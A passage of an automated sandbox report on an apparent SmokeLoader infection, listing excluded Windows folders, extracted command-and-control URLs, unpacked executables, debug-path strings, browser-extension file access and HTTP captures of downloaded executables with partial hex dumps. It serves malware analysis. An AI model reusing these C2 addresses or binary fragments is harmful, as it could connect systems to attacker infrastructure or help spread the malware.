Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows
Source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

Source: C:\Users\user\AppData\Local\Temp\8EAD.exe	Unpacked PE file: 14.2.8EAD.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Unpacked PE file: 18.2.A4A.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\ECAC.exe	Unpacked PE file: 29.2.ECAC.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\DC3D.exe	Unpacked PE file: 31.2.DC3D.exe.400000.0.unpack

Source:	Binary string: netutils.pdbUGP source: rundll32.exe, 0000000C.00000003.413979669.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 352F.PDB3 source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: imagehlp.pdbUGP source: rundll32.exe, 0000000C.00000003.378362910.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: rpcrt4.pdb source: rundll32.exe, 0000000C.00000003.374891452.00000156F18D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.374604013.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: rundll32.exe, 0000000C.00000003.371994060.00000156F17A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\352F.PDB source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: rpcrt4.pdbUGP source: rundll32.exe, 0000000C.00000003.374891452.00000156F18D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.374604013.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: (PKo0C:\Windows\mscorlib.pdb source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdbUGP source: rundll32.exe, 0000000C.00000003.375171512.00000156EF9E3000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdb source: rundll32.exe, 0000000C.00000003.392389951.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdb source: rundll32.exe, 0000000C.00000003.411457320.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdbUGP source: rundll32.exe, 0000000C.00000003.399831459.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A4A.exe, 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECAC.exe, 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: crypt32.pdbUGP source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdb source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: psapi.pdbUGP source: rundll32.exe, 0000000C.00000003.394742994.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msasn1.pdbUGP source: rundll32.exe, 0000000C.00000003.417704379.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: gdi32.pdbUGP source: rundll32.exe, 0000000C.00000003.381552796.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dwmapi.pdbUGP source: rundll32.exe, 0000000C.00000003.391980672.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: rundll32.exe, 0000000C.00000003.357527718.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: user32.pdbUGP source: rundll32.exe, 0000000C.00000003.378460186.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: imagehlp.pdb source: rundll32.exe, 0000000C.00000003.378362910.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A4A.exe, 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECAC.exe, 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: win32u.pdb source: rundll32.exe, 0000000C.00000003.381473884.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: gdi32full.pdb source: rundll32.exe, 0000000C.00000003.381642575.00000156F18F5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: rundll32.exe, 0000000C.00000003.371994060.00000156F17A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dwmapi.pdb source: rundll32.exe, 0000000C.00000003.391980672.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdbGCTL source: rundll32.exe, 0000000C.00000003.411457320.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: imm32.pdb source: rundll32.exe, 0000000C.00000003.386518863.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: gdi32full.pdbUGP source: rundll32.exe, 0000000C.00000003.381642575.00000156F18F5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: profapi.pdb source: rundll32.exe, 0000000C.00000003.411361309.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: gdi32.pdb source: rundll32.exe, 0000000C.00000003.381552796.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdbUGP source: rundll32.exe, 0000000C.00000003.357527718.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdb source: rundll32.exe, 0000000C.00000003.392185369.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msctf.pdbUGP source: rundll32.exe, 0000000C.00000003.388939351.00000156F17AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.389131965.00000156F1930000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 0000000C.00000003.356049880.00000156F14A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.355006773.00000156F1680000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.354216907.00000156F14A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ole32.pdbUGP source: rundll32.exe, 0000000C.00000003.411534915.00000156F17A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdbUGP source: rundll32.exe, 0000000C.00000003.411390290.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdb source: rundll32.exe, 0000000C.00000003.411390290.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msctf.pdb source: rundll32.exe, 0000000C.00000003.388939351.00000156F17AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.389131965.00000156F1930000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: rundll32.exe, 0000000C.00000003.411534915.00000156F17A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: win32u.pdbGCTL source: rundll32.exe, 0000000C.00000003.381473884.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdbUGP source: rundll32.exe, 0000000C.00000003.411302282.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: imm32.pdbUGP source: rundll32.exe, 0000000C.00000003.386518863.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: user32.pdb source: rundll32.exe, 0000000C.00000003.378460186.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: rundll32.exe, 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb-H source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: msasn1.pdb source: rundll32.exe, 0000000C.00000003.417704379.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: rundll32.exe, 0000000C.00000003.411302282.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: psapi.pdb source: rundll32.exe, 0000000C.00000003.394742994.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdbUGP source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdbUGP source: rundll32.exe, 0000000C.00000003.392389951.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: netapi32.pdb source: rundll32.exe, 0000000C.00000003.413933146.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdb source: rundll32.exe, 0000000C.00000003.375171512.00000156EF9E3000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdb source: rundll32.exe, 0000000C.00000003.399831459.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdbUGP source: rundll32.exe, 0000000C.00000003.391792177.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: rundll32.exe, 0000000C.00000003.356049880.00000156F14A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.355006773.00000156F1680000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.354216907.00000156F14A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: profapi.pdbUGP source: rundll32.exe, 0000000C.00000003.411361309.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: netapi32.pdbUGP source: rundll32.exe, 0000000C.00000003.413933146.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdb source: rundll32.exe, 0000000C.00000003.391792177.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdbUGP source: rundll32.exe, 0000000C.00000003.392185369.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: 352F.exe, 00000013.00000002.611328292.0000000004103000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: netutils.pdb source: rundll32.exe, 0000000C.00000003.413979669.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: rundll32.exe, 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypt32.pdb source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AF782C FindFirstFileW,FindNextFileW,FindClose,		12_2_00007DF449AF782C
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AF828C FindFirstFileW,FindNextFileW,		12_2_00007DF449AF828C

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Feb 2023 15:04:31 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 15 Feb 2023 15:00:03 GMTETag: "af800-5f4be55c01562"Accept-Ranges: bytesContent-Length: 718848Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd d7 5b 6a f9 b6 35 39 f9 b6 35 39 f9 b6 35 39 6a f8 ad 39 f8 b6 35 39 96 c0 ab 39 e0 b6 35 39 96 c0 9f 39 95 b6 35 39 f0 ce a6 39 fc b6 35 39 f9 b6 34 39 85 b6 35 39 96 c0 9e 39 dc b6 35 39 96 c0 af 39 f8 b6 35 39 96 c0 a8 39 f8 b6 35 39 52 69 63 68 f9 b6 35 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d a8 88 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 5e 01 00 00 a6 1c 00 00 00 00 00 99 83 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 1e 00 00 04 00 00 49 75 0b 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 62 01 00 3c 00 00 00 00 a0 1d 00 e8 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 42 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 5d 01 00 00 10 00 00 00 5e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 14 0b 1c 00 00 70 01 00 00 26 09 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 69 78 6f 00 00 00 05 00 00 00 00 80 1d 00 00 02 00 00 00 88 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 6f 62 6f 00 00 00 00 04 00 00 00 90 1d 00 00 04 00 00 00 8a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 68 00 00 00 a0 1d 00 00 6a 00 00 00 8e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 15 Feb 2023 15:04:46 GMTContent-Type: application/octet-streamContent-Length: 3826176Last-Modified: Sun, 12 Feb 2023 12:38:07 GMTConnection: keep-aliveETag: "63e8ddaf-3a6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ae dd e8 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 58 3a 00 00 08 00 00 00 00 00 00 5e 76 3a 00 00 20 00 00 00 80 3a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 3a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 76 3a 00 53 00 00 00 00 80 3a 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 3a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 56 3a 00 00 20 00 00 00 58 3a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 80 3a 00 00 06 00 00 00 5a 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 3a 00 00 02 00 00 00 60 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 76 3a 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 60 3a 00 5c 15 00 00 03 00 00 00 01 00 00 06 a8 27 00 00 02 39 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Feb 2023 15:04:50 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 15 Feb 2023 14:48:51 GMTETag: "30a00-5f4be2db47513"Accept-Ranges: bytesContent-Length: 199168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd d7 5b 6a f9 b6 35 39 f9 b6 35 39 f9 b6 35 39 6a f8 ad 39 f8 b6 35 39 96 c0 ab 39 e0 b6 35 39 96 c0 9f 39 95 b6 35 39 f0 ce a6 39 fc b6 35 39 f9 b6 34 39 85 b6 35 39 96 c0 9e 39 dc b6 35 39 96 c0 af 39 f8 b6 35 39 96 c0 a8 39 f8 b6 35 39 52 69 63 68 f9 b6 35 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 14 12 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 5e 01 00 00 b6 14 00 00 00 00 00 99 83 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 16 00 00 04 00 00 ee 96 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 62 01 00 3c 00 00 00 00 b0 15 00 e8 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 42 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 5d 01 00 00 10 00 00 00 5e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 94 1e 14 00 00 70 01 00 00 38 01 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 61 76 00 00 00 00 05 00 00 00 00 90 15 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 74 75 00 00 00 00 04 00 00 00 a0 15 00 00 04 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 68 00 00 00 b0 15 00 00 6a 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Feb 2023 15:04:53 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 15 Feb 2023 15:00:03 GMTETag: "af800-5f4be55c01562"Accept-Ranges: bytesContent-Length: 718848Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd d7 5b 6a f9 b6 35 39 f9 b6 35 39 f9 b6 35 39 6a f8 ad 39 f8 b6 35 39 96 c0 ab 39 e0 b6 35 39 96 c0 9f 39 95 b6 35 39 f0 ce a6 39 fc b6 35 39 f9 b6 34 39 85 b6 35 39 96 c0 9e 39 dc b6 35 39 96 c0 af 39 f8 b6 35 39 96 c0 a8 39 f8 b6 35 39 52 69 63 68 f9 b6 35 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d a8 88 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 5e 01 00 00 a6 1c 00 00 00 00 00 99 83 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 1e 00 00 04 00 00 49 75 0b 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 62 01 00 3c 00 00 00 00 a0 1d 00 e8 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 